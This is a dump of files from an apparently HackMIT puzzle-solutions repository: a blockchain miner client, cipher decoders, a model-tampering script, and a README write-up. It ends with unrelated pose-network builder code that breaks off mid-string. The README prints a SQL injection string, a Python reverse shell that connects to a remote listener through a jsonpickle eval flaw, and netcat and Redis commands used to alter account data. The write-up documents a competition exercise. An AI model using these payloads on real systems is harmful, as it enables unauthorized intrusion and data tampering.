blockchain.head.get_hash(),\n miner = USERNAME\n )\n\n # Let's mine this block.\n result = mine(b)\n\n # Is this _the_ new block?\n # or did the server swoop us :(\n new_chain = get_blockchain()\n\n if result and new_chain and new_chain.head.get_hash() == blockchain.head.get_hash():\n # WE MINED THIS BLOCK YAY.\n # AND WE WIN.\n resp = post_route('add', data=b)\n if resp and resp['success']: #type: ignore\n print(\"Block added!\")\n else:\n print(\"Couldn't add block:\", resp['message']) #type: ignore\n else:\n print(\"Someone else mined the block before us :(\")\n\n\nif __name__ == '__main__':\n print_header()\n load_wallet()\n run_miner()"
},
{
"alpha_fraction": 0.4404761791229248,
"alphanum_fraction": 0.7976190447807312,
"avg_line_length": 18.461538314819336,
"blob_id": "d42202546f27ce473277a6e05b99a024b98e8ac3",
"content_id": "8c2d9101e65e6e685f6dc9bf7adfe7be0f59e167",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/puzzle4/client/constants.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "NODE_SERVER = \"https://hackcrypto.hackwsb.net\"\n\nUSERNAME = \"000alen_7cb3cb\"\n\nDIFFICULTY = 48246703848881748093154577086953264957717418763198680803381914548305920\n\nREWARD = 10000000000\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 2\n\nPRINT_STR_LEN = 20"
},
{
"alpha_fraction": 0.6166471242904663,
"alphanum_fraction": 0.6483001112937927,
"avg_line_length": 28.413793563842773,
"blob_id": "b47cd7f8375eedc47e6bb163001455bcd5677cb8",
"content_id": "6280e93133c41246f0a3a53aad2d6cfc2406d4b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 29,
"path": "/puzzle4/modded_client/crypto.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import base64\nimport hashlib\nimport ed25519\n\n\ndef generate_keys():\n # Heh, I can use private and public so freely in Python.\n private, public = ed25519.create_keypair()\n\n return (private.to_ascii(encoding=\"hex\").decode(\"ascii\"),\n public.to_ascii(encoding=\"hex\").decode(\"ascii\"))\n\n\ndef sign(message: str, private: str):\n signing_key = ed25519.SigningKey(private.encode('ascii'), encoding=\"hex\")\n sign_bytes = signing_key.sign(message.encode(), encoding=\"hex\")\n return sign_bytes.decode('ascii')\n\n\ndef verify(message, public: str, signature: str):\n try:\n vk = ed25519.VerifyingKey(public.encode('ascii'), encoding=\"hex\")\n vk.verify(signature.encode('ascii'),\n message.encode(),\n encoding=\"hex\")\n\n return True\n except ed25519.BadSignatureError:\n return False\n"
},
{
"alpha_fraction": 0.6193327903747559,
"alphanum_fraction": 0.6295979619026184,
"avg_line_length": 24.9777774810791,
"blob_id": "20c46691678e7a7530a9cf036fcdca0007fcd085",
"content_id": "72725554f443baa710819256ecce7a2e8d0beeb7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1169,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 45,
"path": "/puzzle3/bruteforce1.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from transformers import AutoModelForSequenceClassification, AutoTokenizer\nfrom torch import save\n\nmodel = AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\n\n\ndef decode_message_from_model(model):\n idxs = [int(param.sum().item()) % 27 + ord(\"a\") for param in model.parameters()]\n letters = [chr(idx) if idx <= ord(\"z\") else \" \" for idx in idxs]\n return \"\".join(letters)\n\n\ndef decode_parameter(parameter):\n x = int(parameter.sum().item()) % 27 + ord(\"a\")\n return chr(x) if x <= ord(\"z\") else \" \"\n\n\ndef mul(x):\n y = 1\n for i in x:\n y *= i\n return y\n\n\ntarget_string = \"b twlo s twlo b twlo s amc b hood\"\nfor i, parameter in enumerate(model.parameters()):\n if i >= len(target_string):\n break\n\n print(f\"iteracion: {i}\")\n current_sum = parameter.sum().item()\n\n n = mul(parameter.shape)\n\n parameter.data.sub_(26 / n)\n\n for _ in range(26 * 2 + 1):\n if decode_parameter(parameter) == target_string[i]:\n break\n parameter.data.add_(1 / n)\n else:\n raise Exception(\"Cagaste; didn't work\")\n\nprint(decode_message_from_model(model))\nsave(model.state_dict(), \"Alen.pt\")\n"
},
{
"alpha_fraction": 0.46621620655059814,
"alphanum_fraction": 0.6914414167404175,
"avg_line_length": 14.857142448425293,
"blob_id": "19d50c4703beda8df9bf6188285351bf7524e0f5",
"content_id": "09845f946dc7bfbf6bc80de6e39c116ba8c94911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 28,
"path": "/puzzle4/client/requirements.txt",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "certifi==2021.5.30\ncffi==1.14.6\ncharset-normalizer==2.0.4\nclick==8.0.1\ncryptography==3.4.7\ned25519==1.5\nFlask==2.0.1\nflask-redis==0.4.0\nidna==3.2\nitsdangerous==2.0.1\nJinja2==3.0.1\njsonpickle==2.0.0\njwt==1.2.0\nMarkupSafe==2.0.1\nNaked==0.1.31\npycparser==2.20\npyfiglet==0.8.post1\npyOpenSSL==20.0.1\npytz==2021.1\nPyYAML==5.4.1\nredis==3.5.3\nrequests==2.26.0\nshellescape==3.8.1\nsix==1.16.0\ntabulate==0.8.9\ntzlocal==2.1\nurllib3==1.26.6\nWerkzeug==2.0.1\n"
},
{
"alpha_fraction": 0.701259970664978,
"alphanum_fraction": 0.7092174887657166,
"avg_line_length": 34.48235321044922,
"blob_id": "b2c02388f7d1c7cacae65666486f0782c73cbfca",
"content_id": "7746b5369a04e69dfb00da2378b6cbf86976c37f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3016,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 85,
"path": "/puzzle3/training.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import transformers \nimport datasets\nimport torch\nimport numpy\n\ndevice = torch.device(\"cuda\")\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n model.train()\n\n for batch, Z in enumerate(dataloader): \n X = Z[\"sentence\"]\n # X.cuda()\n\n y = Z[\"label\"]\n #y.cuda()\n\n pred = model(X).logits\n loss = loss_fn(pred, y.item()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef compute_metrics(eval_pred):\n logits, labels = eval_pred\n predictions = numpy.argmax(logits, axis=-1)\n return metric.compute(predictions=predictions, references=labels)\n\n\nmodel = transformers.AutoModelForSequenceClassification.from_pretrained(\"HackMIT/double-agent\")\nmodel.cuda()\n\ntokenizer = transformers.AutoTokenizer.from_pretrained(\"HackMIT/double-agent\")\n\n# train_dataset = datasets.load_dataset(\"glue\", \"sst2\")[\"train\"]\n# train_dataset = train_dataset.map(lambda examples: {\"labels\": examples[\"label\"]})\n# train_dataset = train_dataset.map(lambda examples: {\"input_ids\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\n# train_dataset = train_dataset.map(lambda examples: {\"sentence\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\n# train_dataset.set_format(\"torch\")\n\n# train_dataloader = torch.utils.data.DataLoader(train_dataset)\n\nvalidation_dataset = datasets.load_dataset(\"glue\", \"sst2\")[\"validation\"]\nvalidation_dataset = validation_dataset.map(lambda examples: {\"labels\": torch.LongTensor(examples[\"label\"]).to(device)})\n# validation_dataset = validation_dataset.map(lambda examples: {\"input_ids\": tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)})\nvalidation_dataset = validation_dataset.map(lambda examples: {\"sentence\": torch.LongTensor(tokenizer.encode(examples[\"sentence\"], max_length=512, padding=\"max_length\", truncation=True)).to(device)})\nvalidation_dataset.set_format(\"torch\")\n\nvalidation_dataloader = torch.utils.data.DataLoader(validation_dataset)\n\nmetric = datasets.load_metric(\"accuracy\")\n\nloss_function = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n\ntrain(validation_dataloader, model, loss_function, optimizer)\n\ntraining_args = transformers.TrainingArguments(\"with_loss_and_optimizer\")\n\n# trainer = transformers.Trainer(\n# model=model, \n# args=training_args, \n# train_dataset=train_dataset, \n# eval_dataset=validation_dataset,\n# )\n\n# trainer.train()\n\ntrainer = transformers.Trainer(\n model=model, \n args=training_args, \n train_dataset=validation_dataset, \n eval_dataset=validation_dataset,\n compute_metrics=compute_metrics\n)\nprint(trainer.evaluate())\n\ntorch.save(model.state_dict(), \"with_loss_and_optimizer/model.pt\")\n"
},
{
"alpha_fraction": 0.7152400016784668,
"alphanum_fraction": 0.7513607144355774,
"avg_line_length": 41.536842346191406,
"blob_id": "27b926eaf448b94e309e4f25d01d17d5614204e6",
"content_id": "75308c3d657dfc912aedf87d6402dc7247bed80f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4063,
"license_type": "no_license",
"max_line_length": 285,
"num_lines": 95,
"path": "/README.md",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "\n# HackMIT Puzzles Solution\n\n## Entrypoint: Get puzzle link\nI have seen many solutions on how to get the puzzle link, our particular solution was simply to open the Google/Firefox developer tools and print the variable named puzzle_link\n```js\nconsole.log(puzzle_link)\n```\nThe result of that code gave us the following link, which is the dashboard of the puzzle\n```\nhttps://my.hackwsb.net\n```\n## Puzzle 1: GET DA COOKIES 🍪 🍪 🍪\n\n\nThe solution to this puzzle was a SQL injection. To be able to log in with the administrator's password without having it, we had to use the typical injection where at the end of the SQL query we insert a new condition that will help the query to always be true.\n```sql\n'or '1'='1\n```\nAfter executing the code, the web page will change and a counter like the following will appear:\n\nThen you have to click the cookie 5000 times. But that is very boring and slow, so, just open the developer tools and look for the onclick property of the cookie (you will find the function increments the counter by one).\n\nHaving found the function we will do a typical for loop to call that function 5000 times\n\n```js\nfor (let i = 0; i < 5000; i++)\n\tcounter('loremipsum_000000', 'xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx')\n```\nOnce we reach 5000 cookies, we simply open the developer console and find our key.\n```\nYour secret key is: 0000000000000000000000000000000000000000000000000000000000000000\n```\n## Puzzle 2: Beavercoin TO the mooon 🚀 🚀 🚀\n\n\nThe idea behind this puzzle was to decrypt all the \"tweets\", each \"tweet\" had a positive or negative impact with respect to the market.\n\nThe decryption of the tweets was based on the following algorithms (All algorithms can be found in the repository respectively):\n- Hexadecimal\n- Bacon\n- Beaufort\n\nThe procedure we followed as a team was to open a Google Sheet and start noting in tables which tweets had positive and negative impact.\n\nAfter we had a considerable amount of tweets, we did the following:\n- If the tweet affected negatively, we sold everything.\n- If the tweet had a positive impact, we bought everything\n\nAfter doing that approximately 14 times, it gave you the money to be able to buy the key.\n\n## Puzzle 3: Double Agent on WSB\n\n\n## Puzzle 4: How to become a millionare in 12736 easy steps\nWell, the solution to this puzzle is totally different from what the creators of the puzzle expected. While solving the puzzle we realized that the ``jsonpickle`` library could be injected with Python code thanks to a vulnerability. \n\nThe vulnerability was that when the JSON was decoded it would decode into an ``.eval()``, allowing us to execute arbitrary code from the server.\n\nThe code we decided to run was a reverse shell (running directly in Python):\n```python\nCODE = \"\"\"\nimport socket, os, pty\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect((SERVER_IP, 4242))\nos.dup2(s.fileno(), 0)\nos.dup2(s.fileno(), 1)\nos.dup2(s.fileno(), 2)\npty.spawn(\"\\\\x2f\" + \"bin\" + \"\\\\x2f\" + \"sh\")\n\"\"\".strip().replace(\"\\n\", \";\")\n```\n\nBefore executing the code shown we had to have a netcat listener in order to receive the connection.\n\nWe could have used the following code on any Linux computer\n```sh\nnc -lvp 4242\n```\nHaving access to the server, simply connect to the Redis server with the Telnet protocol\n```sh\ntelnet 127.0.0.1 6379\n```\n\nHaving access to the database, we select database 0 and ask for our user's data.\n```sh\nselect 0\nget loremipsum_000000\n```\nThis will give us a JSON. When we do that we will change the value of our user for the one modified by us, which will have the necessary coins to pass the puzzle.\n\n```sh\nset loremipsum_000000 'HERE YOU SHOULD PLACE YOUR MODIFIED JSON'\n```\nDoing this procedure the only thing left to do would be to go to your ``exchange.py`` and donate to get the key.\n\n## Puzzle 5: WE LOVE CHAD 🌙\n"
},
{
"alpha_fraction": 0.728436291217804,
"alphanum_fraction": 0.7470784783363342,
"avg_line_length": 23.4489803314209,
"blob_id": "89141e6cbb6370ed34cd6f3fb1a7135365fa3006",
"content_id": "db1708f000a3a32d38d96fe4c41a4b3448569073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3594,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 147,
"path": "/puzzle4/modded_client/README.md",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "# HackBase Client Code\n\nThe document will outline the basic structure, setup and use of the HackBase client.\n\n## Setup\n\nThe client code is written in Python 3.9. Please make sure your python version is 3.5 and above.\n\nWe would recommend using a virtual environment. In the project directory:\n\n```\npip3 install virtualenv\nvirtualenv venv\nsource venv/bin/activate\n```\n\nGet dependencies,\n\n```\npip3 install -r requirements.txt\n```\n\n## Running\n\nFirst run the exchange client,\n\n```\npython3 exchange.py\n```\n\nThis should generate a new blockchain address and store it in `wallet.json`. Once you have the address, the client will reuse this file.\n\nThen in another terminal launch the miner,\n\n```\npython3 miner.py\n```\n\nThe miner also looks for the `wallet.json` file and will cry if you can't provide it. The miner runs in the background and mines blocks.\n\n## Exchange\n\nThe HackBase exchange provdies a variety of tools to transact your hackcoin. Here are the commands you can use\n\n## Constants\n\nThe `constants.py` file should already come set up with the correct values. If it isn't, set it up as follows:\n\n```python\nNODE_SERVER = \"<url of blockchain>/\"\n\nUSERNAME = \"<username>\"\n\nDIFFICULTY = 6\n\nREWARD = 10\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 2\n\nPRINT_STR_LEN = 20\n```\n\nNote that the difficulty only applies to you as the client. The server can _cheat_ the difficulty and you'd be forced to accept those blocks as valid since you're trying to buy something from the store.\n\n#### Status\n\n```\nstatus\n```\n\nThis will check the status of a given address. If no address is provided, it will check your own status.\n\nThe status includes your account balance on the exchange (in dollars), the amount of Hackcoin you own, and the current market price of Hackcoin.\n\nYour hackcoin balance is computed with respect to the current valid and active chain.\n\n#### View Blockchain\n\n```\nbc\n```\n\nThis will print out the current blockchain in a table format. The information is the same displayed on our website visualizer\n\n### Who\n\n```\nwho\n```\n\nThis will print the other known hackcoin nodes on the network, along with their public address\n\n#### Transfer\n\n```\ntransfer <receiver> <amount>\n```\n\nThis will transfer `<amount>` hackcoin to the address provided in `<receiver>`. The transaction will appear once someone has mined a new block.\n\n#### Transactions\n\n```\ntxns\n```\n\nThis prints out the current pending transactions. Pending transactions are transactions that are waiting to be added to the blockchain once somebody mines a block.\n\n#### Buy Hackcoin\n\n```\nbuy <amount>\n```\n\nThis allows you to buy `<amount>` of hackcoin from the user named `vendor` at the market price. The transaction will be added to the blockchain on the next mined block\n\n#### Sell Hackcoin\n\n```\nsell <amount>\n```\n\nThis allows you to sell `<amount>` of hackcoin to the user named `vendor` at the market price. The vendor requires you to publish the transaction to transfer `<amount>` of hackcoin to the list of pending transactions so they can verify the payment before sending the money.\n\n#### Donate\n\n```\ndonate\n```\n\nThis allows you to donate to the Hackbase corporation. Donations are only made in amounts of $1,333,337\n\n## Tips\n\nThe puzzle resets every 2 hours :). Your solution should not require this much time to run\n\n<!-- ## Donate\n\nHackCoin is a valid cryptocurrency. If you're feeling generous and liked this puzzle, you can donate a few blockchains our way,\n\n```\ndf55754943142026092a8f5ecc768950ab09becd95a4f65cd7516618957b65b9\n```\n\n(Wait for us to announce the tracker to discover valid peers after the puzzle is over.) -->\n"
},
{
"alpha_fraction": 0.6660714149475098,
"alphanum_fraction": 0.6660714149475098,
"avg_line_length": 27,
"blob_id": "b51f99e846c89aea596188e5bbc9ff8f41d06d5f",
"content_id": "089f97b682f32f51e94adf4eb1d3d656755908d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 20,
"path": "/puzzle2/autodecipher.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from json import load, dump\nfrom decipher.bacon import bacon\nfrom decipher.hex import hex \nfrom decipher.beaufort import beaufort\n\n# {[cipher, message], ...}\nciphered = load(open(\"ciphered.json\"))\n\ndeciphered = {}\nfor method, string in ciphered:\n if method == \"bacon\":\n deciphered[string] = bacon(string)\n elif method == \"hex\":\n deciphered[string] = hex(string)\n elif method == \"beaufort\":\n deciphered[string] = beaufort(string)\n else:\n raise Exception(\"You made a typo\")\n\ndump(deciphered, open(\"deciphered.json\", \"w\"))\n"
},
{
"alpha_fraction": 0.6730245351791382,
"alphanum_fraction": 0.6730245351791382,
"avg_line_length": 29.58333396911621,
"blob_id": "724bcd6a4e80c19f27e161348f0fb58b299af3cf",
"content_id": "146a7ddf02078e040d298c88611af1dadf15b2f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/puzzle2/generate_spreadsheet.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "from csv import writer\nfrom json import load\n\ndeciphered = load(open(\"deciphered.json\", \"r\"))\nspreadsheet = writer(open(\"spreadsheet.csv\", \"w\", newline=\"\"), delimiter=\",\")\n\nfor in_string, out_string in deciphered.items():\n print(in_string)\n print(out_string)\n effect = int(input(\">>> \"))\n spreadsheet.writerow([in_string, out_string, effect])\n print()\n"
},
{
"alpha_fraction": 0.43529412150382996,
"alphanum_fraction": 0.7960784435272217,
"avg_line_length": 18.615385055541992,
"blob_id": "b765f9a93c0ff264aa7b96bfacec75cb1aacdd8f",
"content_id": "9ff28541b534b26b90d733ff61773814ef1cf7a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/puzzle4/modded_client/constants.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "NODE_SERVER = \"https://hackcrypto.hackwsb.net\"\n\nUSERNAME = \"000alen_7cb3cb\"\n\nDIFFICULTY = 48246703848881748093154577086953264957717418763198680803381914548305920\n\nREWARD = 10000000\n\nWALLET_FILE = \"wallet.json\"\n\nSTARTING_PRICE = 200000\n\nPRINT_STR_LEN = 20\n"
}
] | 20 |
afcarl/poseInduction
|
https://github.com/afcarl/poseInduction
|
e1d9f917476f97ccca096e3b29a0c93b131ee6ac
|
d58a47002bc3276e4370d219ac9c768ebab060f1
|
26de515ee29b4547d6633ab722c160d9d338d4d7
|
refs/heads/master
| 2020-03-21T05:50:12.272398 | 2015-10-05T21:18:48 | 2015-10-05T21:18:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7163636088371277,
"alphanum_fraction": 0.7690908908843994,
"avg_line_length": 36.931034088134766,
"blob_id": "af5079e8d770bfee4b91575cdca57fa9de193030",
"content_id": "34db442d757c577120e29b2de0f3f0e694996d48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 29,
"path": "/initSetupTraining.sh",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "#directory for data\nmkdir data\n\n# Download PASCAL 3D\nwget ftp://cs.stanford.edu/cs/cvgl/PASCAL3D+_release1.1.zip\nunzip PASCAL3D+_release1.1.zip\nmv PASCAL3D+_release1.1 PASCAL3D\nmv PASCAL3D+* data/\nmv PASCAL3D data/\n\n# move all imagenet images in PASCAL3D+ in one folder, to resemble the pascal VOC setup\nmkdir -p data/imagenet/images\nfor x in $(ls data/PASCAL3D/Images | grep imagenet); do mv data/PASCAL3D/Images/$x/*.JPEG data/imagenet/images/; done\n\n# Download keypoint annotations\nmkdir ./data/segkps\nwget -P ./data/segkps/ http://www.cs.berkeley.edu/~shubhtuls/cachedir/vpsKps/segkps.zip\nunzip ./data/segkps/segkps.zip -d ./data/segkps/\nwget -P ./data/ http://www.cs.berkeley.edu/~shubhtuls/cachedir/poseInduction/vocKpMetadata.mat\n# Download PASCAL VOC\nwget http://host.robots.ox.ac.uk:8080/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar\nwget http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCdevkit_18-May-2011.tar\ntar -xf VOCtrainval_11-May-2012.tar\nmv VOCdevkit data/\nmv VOCtrainval_11-May-2012.tar data/\n\ntar -xf VOCdevkit_18-May-2011.tar\nmv VOCdevkit/* ./data/VOCdevkit/\nrm -rf VOCdevkit\n"
},
{
"alpha_fraction": 0.6229014992713928,
"alphanum_fraction": 0.6419443488121033,
"avg_line_length": 45.76953125,
"blob_id": "6291a3c3a3b2cedfb94291f68e4b800008890728",
"content_id": "0f20b3e3ceb92fb4dc42f5df5765cd22a89d4bdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11973,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 256,
"path": "/prototxts/poseNetConstruct.py",
"repo_name": "afcarl/poseInduction",
"src_encoding": "UTF-8",
"text": "import argparse, sys\nsys.path.append(\"../external/caffe/python\")\nfrom caffe import netSpec as NS\nfrom caffe.proto import caffe_pb2\nfrom collections import OrderedDict\nfrom caffe import netBuildUtils as nbUtils\nnumClasses = 21\nimport numpy as np\nimport os, errno\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise\n\ndef poseNet(genMode, \\\n learn_fc = 1, learn_conv = 1, \\\n quat_loss = 0, softmax_loss = 1, vgg = 1, azimuth_net = 0, class_agnostic = 1, \\\n warp = 1, cpad = 16, flip = 1, batch_size = 20, crop_size = 224, \\\n window_file_folder = '/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/'):\n\n net = NS.NetSpec()\n if warp:\n crop_mode = \"warp\"\n else:\n crop_mode = \"square\"\n\n dataOut = ['data','label'] #output layers from data_layer\n poseOut = ['e1','e2','e3','e1c','e2c','e3c']\n dataOut = dataOut + poseOut\n if quat_loss:\n dataOut = dataOut + ['quat']\n\n if (genMode == 0):\n net.addInputBlobs(OrderedDict([\n ('data',[batch_size,3,crop_size,crop_size]),\n ('label',[batch_size, 1])\n ]))\n elif (genMode == 1):\n transform_param = dict(crop_size=crop_size, mirror=flip)\n window_data_param = dict(source=window_file_folder + 'Train.txt', batch_size = batch_size, context_pad = 16, crop_mode = crop_mode, fg_fraction = 1.0, fg_threshold = 0.5, bg_threshold = 0.5)\n net.addLayer('data', 'WindowPoseData', [], dataOut,\n transform_param = transform_param,\n window_data_param = window_data_param)\n elif (genMode == 2):\n transform_param = dict(crop_size=crop_size, mirror=flip)\n window_data_param = dict(source=window_file_folder + 'Val.txt', batch_size = batch_size, context_pad = 16, crop_mode = crop_mode, fg_fraction = 1.0, fg_threshold = 0.5, bg_threshold = 0.5)\n net.addLayer('data', 'WindowPoseData', [], dataOut,\n transform_param = transform_param,\n window_data_param = window_data_param)\n\n if(vgg):\n conv5_name = nbUtils.addVggTillConv(net, learn_conv, img_blob_name = 'data', suffix='')\n else:\n conv5_name = nbUtils.addAlexnetTillConv(net, learn_conv, img_blob_name = 'data', suffix='')\n\n top_name = nbUtils.addAlexnetFcLayers(net, learn_fc, inputBlobName = conv5_name, suffix='')\n fc7 = top_name\n\n if(quat_loss):\n if(class_agnostic):\n net.addLayer('quatMask', 'InnerProduct',fc7, 'quatMask',\n num_output = 4, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n else:\n net.addLayer('quatPred', 'InnerProduct',fc7, 'quatPred',\n num_output = 4*numClasses, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n net.addLayer('quatMask', 'MaskOutputs', ['quatPred','label'], 'quatMask', convolution_param = dict(kernel_size = 4))\n\n net.addLayer('quatNorm', 'QuatNormalization', 'quatMask', 'quatNorm')\n if(genMode > 0):\n net.addLayer('quatLoss', 'EuclideanAntipodalLoss', ['quatNorm','quat'], 'quatLoss')\n\n if(softmax_loss):\n if(not azimuth_net):\n poseLayerSizes = dict(e1 = 21, e2 = 21, e3 = 21, e1c = 7, e2c = 7, e3c = 7)\n else:\n poseLayerSizes = dict(e1 = 24, e2 = 16, e3 = 8, e1c = 4, e2c = 4, e3c = 4)\n\n for pl in poseOut:\n if(class_agnostic):\n kernel = poseLayerSizes[pl]\n net.addLayer(pl + 'Mask', 'InnerProduct',fc7, pl + 'Mask',\n num_output = kernel, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n else:\n kernel = poseLayerSizes[pl]\n net.addLayer(pl + 'Pred', 'InnerProduct',fc7, pl + 'Pred',\n num_output = kernel*numClasses, weight_filler={'type':\"gaussian\",'std':0.01},\n bias_filler={'type':\"constant\", 'value':0})\n net.addLayer(pl + 'Mask', 'MaskOutputs', [pl + 'Pred','label'], pl + 'Mask', convolution_param = dict(kernel_size = kernel))\n if(genMode > 0):\n net.addLayer(pl + 'Loss', 'SoftmaxWithLoss', [pl + 'Mask',pl], pl + 'Loss')\n if(genMode == 2):\n net.addLayer(pl + 'Accuracy', 'Accuracy', [pl + 'Mask',pl], pl + 'Accuracy')\n\n if(genMode == 0):\n net.addLayer('poseClassify','Concat',[pl + 'Mask' for pl in poseOut],'poseClassify')\n else:\n if(genMode > 0):\n net.addLayer('junkYardPose','Silence',poseOut,[])\n\n if(class_agnostic):\n net.addLayer('junkYardLabel','Silence','label' ,[])\n return net.toProto()\n\ndef constructNet(folder,\\\n\tfilename = 'train.prototxt', valfilename = 'test.prototxt', testfilename = 'deploy.prototxt', \\\n\tlearn_fc = 1, learn_conv = 1, \\\n\tquat_loss = 0, softmax_loss = 1, vgg = 1, azimuth_net = 0, class_agnostic = 1, \\\n\twarp = 1, cpad = 16, flip = 1, batch_size = 20, crop_size = 224, \\\n\twindow_file_folder = '/data1/shubhtuls/code/poseInduction/cachedir/rcnnFinetuneVps/binnedJoint/'):\n\n\t## trainNet\n\ttrainFile = folder + filename\n\twith open(trainFile, 'w') as f:\n\t\tnet = poseNet(1, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\n\tvalFile = folder + valfilename\n\twith open(valFile, 'w') as f:\n\t\tnet = poseNet(2, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\n\n\t## testNet\n\ttestFile = folder + testfilename\n\twith open(testFile, 'w') as f:\n\t\tnet = poseNet(0, \\\n\t\t\tlearn_fc = learn_fc, learn_conv = learn_conv, \\\n\t\t\tquat_loss = quat_loss, softmax_loss = softmax_loss, vgg = vgg, azimuth_net = azimuth_net, class_agnostic = class_agnostic, \\\n\t\t\twarp = warp, cpad = cpad, flip = flip, batch_size = batch_size, crop_size = crop_size, \\\n\t\t\twindow_file_folder = window_file_folder);\n\t\tprint >> f, net\n\ndef constructSolver(folder,\\\n\tfilename = 'train.prototxt', valfilename = 'test.prototxt',\n\tmax_iter = 70000, snapshot = 10000, test_iter = 100, test_interval = 1000, \\\n\tbase_lr = 0.001, lr_policy= \"step\", gamma = 0.1 ,stepsize = 20000 , momentum = 0.9 ,weight_decay = 0.0005, \\\n\tdisplay= 200, \\\n\tsnapshot_folder = '/work5/shubhtuls/snapshots/instancePose/', snapshot_subdir = '', snapshot_prefix = 'net'):\n\n\tmkdir_p(snapshot_folder + snapshot_subdir)\n\tprefix = snapshot_folder + snapshot_subdir + snapshot_prefix\n\tsolverFile = folder + 'solver.prototxt'\n\twith open(solverFile, 'w') as f:\n\t\tf.write(\"train_net : \\\"%s\\\"\\n\" %os.path.abspath(folder + filename) )\n\t\tf.write(\"test_net : \\\"%s\\\"\\n\" %os.path.abspath(folder + valfilename) )\n\t\tf.write(\"max_iter : %d\\n\" %max_iter)\n\t\tf.write(\"snapshot : %d\\n\" %snapshot)\n\t\tf.write(\"test_iter : %d\\n\" %test_iter)\n\t\tf.write(\"test_interval : %d\\n\" %test_interval)\n\t\tf.write(\"base_lr : %f\\n\" %base_lr)\n\t\tf.write(\"lr_policy : \\\"%s\\\"\\n\" %lr_policy)\n\t\tf.write(\"gamma : %f\\n\" %gamma)\n\t\tf.write(\"stepsize : 